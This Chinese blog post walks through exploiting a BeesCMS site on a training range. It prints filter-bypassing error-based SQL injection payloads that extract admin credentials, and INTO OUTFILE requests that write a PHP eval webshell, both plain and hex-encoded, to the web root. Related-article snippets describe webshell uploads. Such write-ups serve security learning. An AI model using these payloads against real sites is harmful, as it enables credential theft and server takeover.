BeesCMS系统漏洞分析

已于 2022-10-02 10:49:38 修改
阅读量2.3k 收藏 14
点赞数 3
分类专栏: cms题 文章标签: 安全 web安全 数据库
于 2022-09-25 13:16:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127036497
版权

墨者学院
在这里插入图片描述
漏洞复现
进入首页,看到没什么问题,用kail字典birb扫下路径(发现管理页面)
在这里插入图片描述
看到输入框,尝试sql注入,发现有注入漏洞
在这里插入图片描述
既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替:

报错注入

admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#

爆出数据库名为dees
在这里插入图片描述

爆表名:
发现from、where、=也被过滤了,等号用like代替

admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#

在这里插入图片描述

爆字段

admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#

在这里插入图片描述
修改为limit 2,1
在这里插入图片描述

爆值

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#

在这里插入图片描述

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#

在这里插入图片描述
md5解密出来admin。

进入后发现没有什么可以动的东西,想起提示网站位于"/var/www/html/"目录下。

上传木马

那么都不用拿到账号密码了。。。。

user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23

在这里插入图片描述
测试文件上传可

下面直接写入一句话木马:

user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30

发现并没有<>被过滤了
在这里插入图片描述
转成16进制

user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30

连接成功
在这里插入图片描述

Yolo山药
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
DamnVanish的博客
10-01 484
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
[代码审计] beecms 4.0 漏洞总结
shawdow_bug的博客
09-24 4526
beecms漏洞
内部靶场系列|BeesCms
白帽子凯哥聊黑客
05-30 1031
校验上传文件的content-type字段,如果content-type字段是允许上传的类型,则上传成功,否则上传失败。所以这里我们只要在数据包中修改content-type字段,就可以绕过上传校验,上传webshell。审计代码得知,该靶场的Content-Type白名单是image/gif。,只是这靶场我把Content-Type白名单限定到只有一个。修改Content-Type白名单为 image/gif。1、 弱口令进入系统后台,文件上传。1、 使用弱口令登录进后台。2、 文件上传点的逻辑。
beescms网站渗透测试和修复意见
TKXS
12-27 6140
beescms网站渗透测试 目录 1.环境搭建 2.渗透前信息收集 3.开始渗透 Beescms实验环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问http://127.0.0.1/beescms/install,开始安装 4、一直下一步,出现如下界面,输入数据库账户密码 5、成功安装 6、修改mysql.ini 文件,在mysqld 下添加条目: secu
【beescms】命令执行、报错注入
qq_51979295的博客
09-28 621
pwn的题死活下载不下来,今天写点别的,还有点别的洞没写,改天补上
BEESCMS靶场小记
I_WORM的博客
01-17 650
进入网站首页,url后面通过输入admin发现了后台管理系统的登录界面。用弱口令admin admin 直接进去了;(可以看到一些系统信息)从图片管理位置可以查看上传的原图;可以看到上传了一个php文件;对文件进行上传(上传一个hello.php文件)不要勾选缩略图。通过查看里面的数据发现了一个文件上传点。通过抓包对MIME类型进行修改上传成功。复制图片的链接访问成功执行。
BEESCMS企业网站管理系统 4.0
04-30
BEESCMS企业网站管理系统,SEO优化更快,无功能限制,后台上手容易,各类行业模板供选择使用!全面支持手机网站,电脑手机模板标签全部通用,一个后台管理,电脑、手机网站同步更新。BEESCMS企业网站管理系统 4.0 ...
BEESCMS企业网站管理系统 v3.3
05-17
BEESCMS企业网站管理系统拥有简单方便的模板标签,能够快速做出模板;自定义表单,自定义模型,内置新闻、下载、产品、招聘、单页模型;SEO功 能,每个页面都可以单独SEO优化;多语言,多风格,每种语言每个页面都...
BEESCMS企业网站管理系统.7z
03-15
7. **网站统计与分析**:BEESCMS可能集成了网站访问统计功能,帮助用户了解网站的访问情况,如访问量、访客来源、页面浏览量等,为企业决策提供数据支持。 8. **安全防护**:作为企业级系统,BEESCMS会内置一些安全...
BEESCMS企业网站管理系统 3.4.rar
05-27
BEESCMS企业网站管理系统拥有简单方便的模板标签,能够快速做出模板;自定义表单,自定义模型,内置新闻、下载、产品、招聘、单页模型;SEO功 能,每个页面都可以单独SEO优化;多语言,多风格,每种语言每个页面都...
beescms总结
02-29
自己beescms二次开发时总结的相关问题还有一些自己写的方法分享给大家,希望对大家有帮助.
BEESCMS企业网站管理系统源码 v4.0.zip
07-06
BEESCMS企业网站管理系统拥有简单方便的模板标签,能够快速做出模板;自定义表单,自定义模型,内置新闻、下载、产品、招聘、单页模型;SEO功 能,每个页面都可以单独SEO优化;多语言,多风格,每种语言每个页面都可以定义风格;html静态页面生成功能;BEES还可以自定义flash引导页。 BEESCMS企业网站管理系统源码 v4.0 更新日志 修复:留言本内容截取问题; 程序:去除HTML生成,更改为伪静态; 程序:增加手机版本,标签、模板和电脑版一样; 程序:优化一部分后台功能; 模板:新增默认手机模板; 修复:其它一些BUG。 BEESCMS企业网站管理系统源码主要特性 1、支持多种语言 BEES支持多种语言,后台添加自动生成,可为每种语言分配网站风格。 2、功能强大灵活 BEES除内置的文章、产品等模型外,还可以自定义生成其它模型,满足不同的需求 3、自定义表单系统 BEES可自定义表单系统,后台按需要生成,将生成的标签加到模板中便可使用。 4、模板制作方便 采用MVC设计模式实现了程序与模板完全分离,分别适合美工和程序员使用。 5、用户体验好 前台、后台、会员中心模板都采用 DIV CSS,兼容 IE 和 Firefox 浏览器,访问速度快。 6、支持用户反馈信息 7、SEO优化 可设置网站SEO参数及所有页面SEO信息,如关键词、页面描述等; 可全站生成静态html页面 8、输出内容全部后台设置 BEESCMS企业网站管理系统源码截图 相关阅读 同类推荐:企业网站源码
web应用漏洞.docx
07-05
这些漏洞来自于多种 Web 应用程序,如 ColdFusion、BEESCMS、DedeCMS、Discuz、Drupal、ECShop、ElasticSearch、eWebeditor、FengCMS、FineCMS、Gitlab、Gogs、JBoss、Jenkins、Jolokia、Joomla 等。 一、远程代码...
【代码审计】小白友好的根据CNVD审计BEESCMS
最新发布
uuzeray的博客
01-29 1548
我们就用刚上传的一句话木马试一下:upload/img/20121208/201212082353104864.php。看起来有很多,但不少include的参数已经写死了,这些我们就不用看,我们需要找可控变量。访问一下/admin/admin_channel.php。找到/admin/admin_channel.php。访问/admin/admin_pic.php。回到/admin/admin_pic.php。直接用第一个/admin_ajax.php。跟一下$value,发现是全局且可控的。
模拟攻击beescms框架网站,并且一步一步渗透测试,上传shell,连接蚁剑,拿到对方网站根目录
weixin_52149916的博客
11-06 748
观看页面功能发现有文件上传,测试有没有上传漏洞,在网上寻找资料发现我们直接可以通过http://IP地址/admin/admin_file_upload.php来到文件附件上传界面,并且它允许PHP格式文件那么直接上传shell脚本文件发现上传成功,连接蚁剑。发现有4个参数有user,password,code,submit,把submit=ture修改为submit=false验证码就不会刷新了就是284c。发现密码不完整,用substr函数截取后面的 '~53b01a0eb~'开始攻击发现爆破不出来。
BeesCMS系统漏洞分析溯源
qq_45927819的博客
11-14 4907
先使用御剑扫一波,发现后台登录界面admin/login.php: 用户名一栏输入单引号,发现存在sql注入, 当输入admin’ or 1=1#后又返回正常的报错界面 看来闭合符号为单引号 注入开始: admin' union select 1,2,3,4,5# union 和select被过滤了 既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替: 报错注入 adm.
Beescms代码审计
qq_50589021的博客
09-20 746
Beescms代码审计之任意文件上传漏洞 前言 本次代码审计过程主要针对文件上传漏洞初级审计流程的思路进行复现 关键代码 文件上传: $_FILES,type="file",上传,move_upload_file()等 开始 搜索type="file"字段发现不少东西: 选择第二个,发现了用户自定义的函数: 跟踪一下: 结合实际情况进行抓包通过参数定位到代码中进行确定: 可以确定确实是这一块的代码 两处滤点: 针对太大的图片进行了过滤 将图片类型与传入的参数$type数组进行了比较,判断是否满足数组
beescms php企业网站管理系统(全站生成html),BEES 企业网站管理系统
weixin_39899226的博客
06-08 291
增加频道页调用函数,可以在lib.php中查看修复列表页和内容输出列表排序的问题,默认有后台内容列表有排序修复表单提交错误修复表单调用出错修复其它一些BUG主要特性:1、支持多种语言BEES支持多种语言,后台添加自动生成,可为每种语言分配网站风格。2、功能强大灵活BEES除内置的文章、产品等模型外,还可以自定义生成其它模型,满足不同的需求3、自定义表单系统BEES可自定义表单系统,后台按需要生成,...
Beescms_v4.0 sql注入漏洞复现与原理分析(白盒与黑盒)
不想当脚本小子的脚本小子
12-27 2469
一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1.官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html,然后解压压缩文件,然后把文件放到phpstudy的网站根目录 2.浏览器访问http://安装目录/install,开始安装 一直下一步出现如下界面即可安装完成: 安装完成后修改my.ini文件,在[mysqld]后面添加secure_fil
awd怎么运行python
11-06
在运行Python脚本时,我们可以使用AWD(也称为Auto Web Discovery)来轻松地启动和管理Python的Web应用程序。 首先,确保已经安装了Python解释器。在命令行窗口中,可以输入"python --version"来检查Python版本。如果未安装Python,则需要先下载并安装。 接下来,我们需要安装AWD库。可以使用pip命令来安装。在命令行窗口中输入"pip install awd",等待安装完成。 安装完成后,可以通过在命令行窗口中输入"awd init"来初始化AWD。这将在当前目录下创建一个awd.ini文件,其中包含必要的配置信息。 然后,可以创建一个Python脚本,用以编写我们的Web应用程序。例如,可以使用Flask框架来创建一个简单的Web应用程序。在脚本中,我们需要导入Flask库,并定义一个应用对象。可以指定路由和处理函数来处理不同的URL请求。 完成脚本编写后,可以使用"awd run"命令来运行我们的Web应用程序。这将自动启动一个本地服务器,并将Web应用程序绑定到指定的主机和端口上。 在浏览器中输入指定的主机和端口,就可以访问我们的Web应用程序了。例如,如果我们将应用绑定到localhost和5000端口上,可以在浏览器中输入"http://localhost:5000"来访问。 同时,AWD还提供了其他功能,例如自动重新加载和处理静态文件等。这些功能可以在awd.ini文件中进行配置。 总的来说,AWD可以帮助我们更方便地运行和管理Python的Web应用程序,使得开发过程更加高效和便捷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值